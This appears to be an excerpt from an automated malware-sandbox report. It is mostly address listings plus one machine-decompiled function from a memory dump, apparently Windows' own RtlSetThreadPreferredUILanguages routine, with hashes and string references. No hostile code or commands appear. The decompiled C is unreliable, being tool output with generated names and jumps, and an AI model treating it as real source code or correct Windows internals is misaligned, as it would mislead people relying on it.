                                                                        0x00000000
                                                                        0x01502805
                                                                        0x0150280a
                                                                        0x01502814
                                                                        0x01502816
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0150281e
                                                                        0x01502821
                                                                        0x01502823
                                                                        0x00000000
                                                                        0x01502829
                                                                        0x01502829
                                                                        0x01502831
                                                                        0x0150283c
                                                                        0x0150283e
                                                                        0x00000000
                                                                        0x0150283e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0150284e
                                                                        0x01502850
                                                                        0x01502851
                                                                        0x01502854
                                                                        0x01502857
                                                                        0x0150285a
                                                                        0x0150285c
                                                                        0x0150285d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0150275d
                                                                        0x01502761
                                                                        0x00000000
                                                                        0x01502767
                                                                        0x0150276e
                                                                        0x01502773
                                                                        0x01502773
                                                                        0x01502776
                                                                        0x01502778
                                                                        0x0150277e
                                                                        0x0150277e
                                                                        0x01502781
                                                                        0x01502781
                                                                        0x01502783
                                                                        0x01502784
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545bd8
                                                                        0x01545bde
                                                                        0x01545be4
                                                                        0x01545be6
                                                                        0x01545be8
                                                                        0x01545be9
                                                                        0x01545bee
                                                                        0x01545bf8
                                                                        0x01545bff
                                                                        0x01545c01
                                                                        0x01545c04
                                                                        0x01545c07
                                                                        0x01545c0b
                                                                        0x01545c0d
                                                                        0x01545c0d
                                                                        0x01545c15
                                                                        0x01545c18
                                                                        0x01545c1b
                                                                        0x01545c1b
                                                                        0x01545c1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015028c3
                                                                        0x015028c8
                                                                        0x015028d2
                                                                        0x015028d4
                                                                        0x015028d8
                                                                        0x015028db
                                                                        0x01545c26
                                                                        0x01545c28
                                                                        0x01545c2d
                                                                        0x01545c2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545c34
                                                                        0x01545c36
                                                                        0x01545c49
                                                                        0x01545c4e
                                                                        0x01545c54
                                                                        0x01545c5b
                                                                        0x01545c5d
                                                                        0x01545c60
                                                                        0x01502788
                                                                        0x01502788
                                                                        0x0150278b
                                                                        0x0150278e
                                                                        0x0150278e
                                                                        0x0150278e
                                                                        0x01502791
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502756
                                                                        0x01502750
                                                                        0x00000000
                                                                        0x01502794
                                                                        0x01502794
                                                                        0x01502795
                                                                        0x01502798
                                                                        0x01502798
                                                                        0x00000000
                                                                        0x01502734
                                                                        0x0150272c
                                                                        0x01502700
                                                                        0x015025ef
                                                                        0x015025ef
                                                                        0x015025ef
                                                                        0x015025f2
                                                                        0x015025f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015025fe
                                                                        0x00000000
                                                                        0x015028e6
                                                                        0x015028ec
                                                                        0x015028ef
                                                                        0x015028f5
                                                                        0x015028f8
                                                                        0x015028f8
                                                                        0x00000000
                                                                        0x015028f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502866
                                                                        0x01502866
                                                                        0x01502876
                                                                        0x01502879
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015027e0
                                                                        0x015027e7
                                                                        0x015027e9
                                                                        0x015027eb
                                                                        0x01545afd
                                                                        0x00000000
                                                                        0x01545afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502633
                                                                        0x01502638
                                                                        0x0150263b
                                                                        0x0150263c
                                                                        0x0150263e
                                                                        0x01502640
                                                                        0x01502642
                                                                        0x01502647
                                                                        0x01502649
                                                                        0x0150264e
                                                                        0x01502650
                                                                        0x01502653
                                                                        0x01502659
                                                                        0x015026a2
                                                                        0x015026a7
                                                                        0x015026ac
                                                                        0x015026b2
                                                                        0x01545b11
                                                                        0x01545b15
                                                                        0x01545b17
                                                                        0x00000000
                                                                        0x015026b8
                                                                        0x015026b8
                                                                        0x015026ba
                                                                        0x015027a6
                                                                        0x015027a6
                                                                        0x015027a9
                                                                        0x015027ab
                                                                        0x015027b9
                                                                        0x015027b9
                                                                        0x015027be
                                                                        0x015027c1
                                                                        0x015027c3
                                                                        0x015027c5
                                                                        0x015027c7
                                                                        0x01545c74
                                                                        0x01545c79
                                                                        0x01545c79
                                                                        0x015027c7
                                                                        0x00000000
                                                                        0x015026c0
                                                                        0x015026c0
                                                                        0x015026c3
                                                                        0x015026c6
                                                                        0x015026c6
                                                                        0x015026c9
                                                                        0x015026c9
                                                                        0x00000000
                                                                        0x015026c9
                                                                        0x015026ba
                                                                        0x0150265b
                                                                        0x0150265b
                                                                        0x0150265e
                                                                        0x01502667
                                                                        0x0150266d
                                                                        0x01502677
                                                                        0x0150267c
                                                                        0x0150267f
                                                                        0x01502681
                                                                        0x01545b49
                                                                        0x01545b4e
                                                                        0x015027cd
                                                                        0x015027d0
                                                                        0x015027d1
                                                                        0x015027d2
                                                                        0x015027d4
                                                                        0x015027dd
                                                                        0x01502687
                                                                        0x01502687
                                                                        0x0150268a
                                                                        0x0150268b
                                                                        0x0150268e
                                                                        0x0150268f
                                                                        0x01502691
                                                                        0x01502696
                                                                        0x01502698
                                                                        0x0150269d
                                                                        0x0150269f
                                                                        0x00000000
                                                                        0x0150269f
                                                                        0x01502681
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502846
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502605
                                                                        0x0150260a
                                                                        0x0150260c
                                                                        0x01502611
                                                                        0x01502616
                                                                        0x01502619
                                                                        0x01502619
                                                                        0x0150261e
                                                                        0x00000000
                                                                        0x01502624
                                                                        0x01502627
                                                                        0x01502627
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545b1f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01502894
                                                                        0x0150289b
                                                                        0x0150289d
                                                                        0x015028a1
                                                                        0x01545b2b
                                                                        0x01545b2e
                                                                        0x01545b2e
                                                                        0x015028a7
                                                                        0x015028a9
                                                                        0x01545b04
                                                                        0x01545b09
                                                                        0x01545b09
                                                                        0x01545b09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01545b35
                                                                        0x01545b3c
                                                                        0x015028fb
                                                                        0x015028fb
                                                                        0x015026cc
                                                                        0x015026cc
                                                                        0x015026d0
                                                                        0x00000000
                                                                        0x015026d2
                                                                        0x015026d2
                                                                        0x00000000
                                                                        0x015026d2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015025fe
                                                                        0x0150292d
                                                                        0x0150292f
                                                                        0x01502930
                                                                        0x01502935
                                                                        0x01502937
                                                                        0x01502938
                                                                        0x0150293b
                                                                        0x0150293c
                                                                        0x0150293e
                                                                        0x0150293f
                                                                        0x01502940
                                                                        0x01502942
                                                                        0x01502944
                                                                        0x01502948
                                                                        0x0150294e
                                                                        0x0150294f
                                                                        0x01502950
                                                                        0x01502957
                                                                        0x01502958
                                                                        0x0150295a
                                                                        0x0150295d
                                                                        0x01502960
                                                                        0x01502962
                                                                        0x01502963
                                                                        0x01502964
                                                                        0x01502966
                                                                        0x01502969
                                                                        0x0150296a
                                                                        0x0150296e
                                                                        0x01502972
                                                                        0x01502973
                                                                        0x01502974
                                                                        0x0150297b
                                                                        0x0150297c
                                                                        0x0150297e
                                                                        0x0150297f
                                                                        0x01502980
                                                                        0x01502981
                                                                        0x01502982
                                                                        0x01502983
                                                                        0x01502984
                                                                        0x01502985
                                                                        0x01502986
                                                                        0x01502987
                                                                        0x01502988
                                                                        0x01502989
                                                                        0x0150298a
                                                                        0x0150298b
                                                                        0x0150298c
                                                                        0x0150298d
                                                                        0x0150298e
                                                                        0x0150298f
                                                                        0x01502990
                                                                        0x01502992
                                                                        0x01502997
                                                                        0x015029a3
                                                                        0x015029a6
                                                                        0x015029ab
                                                                        0x015029ad
                                                                        0x015029b0
                                                                        0x015029b2
                                                                        0x01545c80
                                                                        0x015029b8
                                                                        0x015029b8
                                                                        0x015029bb
                                                                        0x015029c0
                                                                        0x015029c5
                                                                        0x015029c6
                                                                        0x015029c6
                                                                        0x015029c9
                                                                        0x015029cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015029cd
                                                                        0x015029d0
                                                                        0x015029d9
                                                                        0x015029db
                                                                        0x015029dd
                                                                        0x01502a7f
                                                                        0x01502a84
                                                                        0x01502a87
                                                                        0x01502a89
                                                                        0x01545ca1
                                                                        0x01545ca3
                                                                        0x00000000
                                                                        0x01502a8f
                                                                        0x01502a8f
                                                                        0x00000000
                                                                        0x01502a8f
                                                                        0x00000000
                                                                        0x015029e3
                                                                        0x015029e3
                                                                        0x015029e3
                                                                        0x00000000
                                                                        0x015029e3
                                                                        0x015029dd
                                                                        0x00000000
                                                                        0x015029db
                                                                        0x015029e6
                                                                        0x015029e9
                                                                        0x015029eb
                                                                        0x015029ed
                                                                        0x015029f3
                                                                        0x015029f5
                                                                        0x015029f8
                                                                        0x015029fa
                                                                        0x01502a97
                                                                        0x01502a9a
                                                                        0x01502a9d
                                                                        0x01502add
                                                                        0x00000000
                                                                        0x01502a9f
                                                                        0x01502aa2
                                                                        0x01502aa5
                                                                        0x01502aa8
                                                                        0x01502aab
                                                                        0x01545cab
                                                                        0x01545caf
                                                                        0x01545cc5
                                                                        0x01545cda
                                                                        0x01545cdc
                                                                        0x01545cdf
                                                                        0x01545ce5
                                                                        0x00000000
                                                                        0x01545ceb
                                                                        0x01545ced
                                                                        0x01545cee
                                                                        0x00000000
                                                                        0x01545cee
                                                                        0x01545cb1
                                                                        0x01545cb4
                                                                        0x01545cb9
                                                                        0x01545cbb
                                                                        0x00000000
                                                                        0x01545cbd
                                                                        0x01545cbd
                                                                        0x00000000
                                                                        0x01545cbd
                                                                        0x01545cbb
                                                                        0x01502ab1
                                                                        0x01502ab1
                                                                        0x01502ac4
                                                                        0x01502ac6
                                                                        0x01502ac6
                                                                        0x00000000
                                                                        0x01502ac6
                                                                        0x01502aab
                                                                        0x00000000
                                                                        0x01502a00
                                                                        0x01502a09
                                                                        0x01502a0e
                                                                        0x01502a21
                                                                        0x01502a24
                                                                        0x01502a35
                                                                        0x01502a3a
                                                                        0x01502a3d
                                                                        0x01502a42
                                                                        0x01502a59
                                                                        0x01502a59
                                                                        0x01502a5c
                                                                        0x01502a5f
                                                                        0x01502a5f
                                                                        0x015029fa
                                                                        0x015029f3
                                                                        0x01502a64
                                                                        0x01502a64
                                                                        0x01502a6b
                                                                        0x01502a6b
                                                                        0x01502a6d
                                                                        0x01502a72
                                                                        0x01502a72
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PATH
                                                                        • API String ID: 0-1036084923
                                                                        • Opcode ID: 700642d8b6c2b69d950cc4acdef1e0730083e0d456589de5435fabf97630cd5f
                                                                        • Instruction ID: a9d3254c120e6a73cd813b4e99c01b04e8b70d01cdc5b8ac51149302586a1ce2
                                                                        • Opcode Fuzzy Hash: 700642d8b6c2b69d950cc4acdef1e0730083e0d456589de5435fabf97630cd5f
                                                                        • Instruction Fuzzy Hash: 38C1AE71D0021ADFDB26DF99C884ABEBBF5FF48700F18442AE505AF290E734A945CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0150FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E0150FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E014EEEF0(0x15c7b60);
					_t134 =  *0x15c7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x15c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x15c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E014E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E014E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01578938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E014DB150();
													}
													_t116 = E01576D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E014E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x15c8638; // 0x0
																	_t122 = L014E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E014E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E014E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0150FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L014E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0150FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0150FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0150FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0150FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0150FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x15c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x15c7b84 = _t75;
						_t73 = E014EEB70(_t134, 0x15c7b60);
						if( *0x15c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E014EFF60( *0x15c7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                        0x0150fab0
                                                                        0x0150fab2
                                                                        0x0150fab3
                                                                        0x0150fab4
                                                                        0x0150fabc
                                                                        0x0150fac0
                                                                        0x0150fb14
                                                                        0x0150fb17
                                                                        0x0150fac2
                                                                        0x0150fac8
                                                                        0x0150facd
                                                                        0x0150fad3
                                                                        0x0150fad3
                                                                        0x0150fadd
                                                                        0x0150fb18
                                                                        0x0150fb1b
                                                                        0x0150fb1d
                                                                        0x0150fb1e
                                                                        0x0150fb1f
                                                                        0x0150fb20
                                                                        0x0150fb21
                                                                        0x0150fb22
                                                                        0x0150fb23
                                                                        0x0150fb24
                                                                        0x0150fb25
                                                                        0x0150fb26
                                                                        0x0150fb27
                                                                        0x0150fb28
                                                                        0x0150fb29
                                                                        0x0150fb2a
                                                                        0x0150fb2b
                                                                        0x0150fb2c
                                                                        0x0150fb2d
                                                                        0x0150fb2e
                                                                        0x0150fb2f
                                                                        0x0150fb3a
                                                                        0x0150fb3b
                                                                        0x0150fb3e
                                                                        0x0150fb41
                                                                        0x0150fb44
                                                                        0x0150fb47
                                                                        0x0150fb4a
                                                                        0x0150fb4d
                                                                        0x0150fb53
                                                                        0x0154bdcb
                                                                        0x0154bdcb
                                                                        0x0150fb59
                                                                        0x0150fb5b
                                                                        0x0150fb5b
                                                                        0x0150fb5e
                                                                        0x0154bdd5
                                                                        0x0154bdd8
                                                                        0x00000000
                                                                        0x0154bdda
                                                                        0x00000000
                                                                        0x0154bdda
                                                                        0x0150fb64
                                                                        0x0150fb64
                                                                        0x0150fb64
                                                                        0x0150fb67
                                                                        0x0150fb6e
                                                                        0x0150fb70
                                                                        0x0150fb72
                                                                        0x00000000
                                                                        0x0150fb78
                                                                        0x0150fb7a
                                                                        0x0150fb7a
                                                                        0x0150fb7d
                                                                        0x0150fb80
                                                                        0x0154bddf
                                                                        0x0154bde1
                                                                        0x00000000
                                                                        0x0154bde3
                                                                        0x00000000
                                                                        0x0154bde3
                                                                        0x0150fb86
                                                                        0x0150fb86
                                                                        0x0150fb86
                                                                        0x0150fb8b
                                                                        0x0150fb90
                                                                        0x0150fb92
                                                                        0x0150fb94
                                                                        0x0150fb9a
                                                                        0x0150fb9b
                                                                        0x0150fba1
                                                                        0x0154bde8
                                                                        0x0154bdeb
                                                                        0x0154bded
                                                                        0x0154beb5
                                                                        0x0154beb5
                                                                        0x0154bebb
                                                                        0x0154bebd
                                                                        0x0154bec3
                                                                        0x0154bed2
                                                                        0x0154bedd
                                                                        0x0154bedd
                                                                        0x0154beed
                                                                        0x00000000
                                                                        0x0154bdf3
                                                                        0x0154bdfe
                                                                        0x0154be06
                                                                        0x0154be0b
                                                                        0x0154be0d
                                                                        0x0154be0f
                                                                        0x0154be14
                                                                        0x0154be19
                                                                        0x0154be20
                                                                        0x0154be25
                                                                        0x0154be27
                                                                        0x0154be35
                                                                        0x0154be39
                                                                        0x0154be46
                                                                        0x0154be4f
                                                                        0x0154be54
                                                                        0x0154be56
                                                                        0x0154bef8
                                                                        0x0154bef8
                                                                        0x00000000
                                                                        0x0154be5c
                                                                        0x0154be5c
                                                                        0x0154be60
                                                                        0x00000000
                                                                        0x0154be66
                                                                        0x0154be66
                                                                        0x0154be7f
                                                                        0x0154be84
                                                                        0x0154be87
                                                                        0x0154be89
                                                                        0x0154be8b
                                                                        0x0154be99
                                                                        0x0154be9d
                                                                        0x0154bea0
                                                                        0x0154beac
                                                                        0x0154beaf
                                                                        0x0154beb1
                                                                        0x0154beb3
                                                                        0x0154beb3
                                                                        0x00000000
                                                                        0x0154bea2
                                                                        0x0154bea2
                                                                        0x00000000
                                                                        0x0154bea2
                                                                        0x0154be8d
                                                                        0x0154be8d
                                                                        0x0154be92
                                                                        0x00000000
                                                                        0x0154be92
                                                                        0x0154be8b
                                                                        0x0154be60
                                                                        0x0154be3b
                                                                        0x0154be3b
                                                                        0x0154be3e
                                                                        0x00000000
                                                                        0x0154be40
                                                                        0x0154be40
                                                                        0x0154be44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0154be44
                                                                        0x0154be3e
                                                                        0x0154be29
                                                                        0x0154be29
                                                                        0x00000000
                                                                        0x0154be29
                                                                        0x0154be27
                                                                        0x00000000
                                                                        0x0150fba7
                                                                        0x0150fba7
                                                                        0x0150fbab
                                                                        0x0154bf02
                                                                        0x0150fbb1
                                                                        0x0150fbb1
                                                                        0x0150fbb8
                                                                        0x0150fbbd
                                                                        0x0150fbbd
                                                                        0x0150fbbf
                                                                        0x0150fbbf
                                                                        0x0150fbc5
                                                                        0x0150fbcb
                                                                        0x0150fbf8
                                                                        0x0150fbf8
                                                                        0x0150fbfa
                                                                        0x00000000
                                                                        0x0150fc00
                                                                        0x0150fc00
                                                                        0x0150fc03
                                                                        0x00000000
                                                                        0x0150fc09
                                                                        0x0150fc09
                                                                        0x0150fc0f
                                                                        0x0150fc15
                                                                        0x0150fc23
                                                                        0x0150fc23
                                                                        0x0150fc25
                                                                        0x0150fc27
                                                                        0x0150fc75
                                                                        0x0150fc7c
                                                                        0x0150fc84
                                                                        0x00000000
                                                                        0x0150fc29
                                                                        0x0150fc29
                                                                        0x0150fc2d
                                                                        0x0150fc30
                                                                        0x0154bf0f
                                                                        0x00000000
                                                                        0x0150fc36
                                                                        0x0150fc38
                                                                        0x0150fc3b
                                                                        0x0150fc41
                                                                        0x0154bf17
                                                                        0x0154bf19
                                                                        0x0154bf48
                                                                        0x0154bf4b
                                                                        0x00000000
                                                                        0x0154bf1b
                                                                        0x0154bf22
                                                                        0x0154bf24
                                                                        0x0154bf26
                                                                        0x00000000
                                                                        0x0154bf2c
                                                                        0x0154bf37
                                                                        0x0154bf39
                                                                        0x0154bf3b
                                                                        0x00000000
                                                                        0x0154bf41
                                                                        0x0154bf41
                                                                        0x0154bf41
                                                                        0x0154bf41
                                                                        0x0154bf45
                                                                        0x00000000
                                                                        0x0154bf45
                                                                        0x0154bf3b
                                                                        0x0154bf26
                                                                        0x00000000
                                                                        0x0150fc47
                                                                        0x0150fc47
                                                                        0x0150fc49
                                                                        0x0150fcb2
                                                                        0x0150fcb4
                                                                        0x0150fcb6
                                                                        0x0150fcdc
                                                                        0x0150fcdc
                                                                        0x00000000
                                                                        0x0150fcb8
                                                                        0x0150fcc3
                                                                        0x0150fcc5
                                                                        0x0150fcc7
                                                                        0x00000000
                                                                        0x0150fcc9
                                                                        0x0150fcc9
                                                                        0x0150fccd
                                                                        0x00000000
                                                                        0x0150fccd
                                                                        0x0150fcc7
                                                                        0x00000000
                                                                        0x0150fc4b
                                                                        0x0150fc4b
                                                                        0x0150fc4e
                                                                        0x0150fc4e
                                                                        0x0150fc51
                                                                        0x0150fc51
                                                                        0x0150fc54
                                                                        0x0150fc5a
                                                                        0x0150fc5c
                                                                        0x0150fc5f
                                                                        0x0150fc61
                                                                        0x0150fc63
                                                                        0x0150fc65
                                                                        0x0150fc67
                                                                        0x0150fc6e
                                                                        0x0150fc72
                                                                        0x0150fc72
                                                                        0x0150fc72
                                                                        0x0150fc72
                                                                        0x0150fc67
                                                                        0x0150fc61
                                                                        0x00000000
                                                                        0x0150fc5a
                                                                        0x0150fc49
                                                                        0x0150fc41
                                                                        0x0150fc30
                                                                        0x0150fc27
                                                                        0x0150fc03
                                                                        0x0150fbcd
                                                                        0x0150fbd3
                                                                        0x0150fbd9
                                                                        0x0150fbdc
                                                                        0x0150fbde
                                                                        0x0150fc99
                                                                        0x0150fc9b
                                                                        0x0150fc9d
                                                                        0x0150fcd5
                                                                        0x0150fcd5
                                                                        0x0150fc89
                                                                        0x0150fc89
                                                                        0x00000000
                                                                        0x0150fc9f
                                                                        0x0150fc9f
                                                                        0x0150fca3
                                                                        0x00000000
                                                                        0x0150fca3
                                                                        0x00000000
                                                                        0x0150fbe4
                                                                        0x0150fbe4
                                                                        0x0150fbe4
                                                                        0x0150fbe4
                                                                        0x0150fbe9
                                                                        0x0150fbf2
                                                                        0x00000000
                                                                        0x0150fbf2
                                                                        0x0150fbde
                                                                        0x0150fbcb
                                                                        0x0150fbab
                                                                        0x0150fc8b
                                                                        0x0150fc8b
                                                                        0x0150fc8c
                                                                        0x0150fb80
                                                                        0x0150fb72
                                                                        0x0150fb5e
                                                                        0x0150fc8d
                                                                        0x0150fc91
                                                                        0x0150fadf
                                                                        0x0150fadf
                                                                        0x0150fae1
                                                                        0x0150fae4
                                                                        0x0150fae7
                                                                        0x0150faec
                                                                        0x0150faf8
                                                                        0x0150fb00
                                                                        0x0150fb07
                                                                        0x0150fb0f
                                                                        0x0150fb0f
                                                                        0x0150fb07
                                                                        0x00000000
                                                                        0x0150faf8
                                                                        0x0150fadd

                                                                        Strings
                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0154BE0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
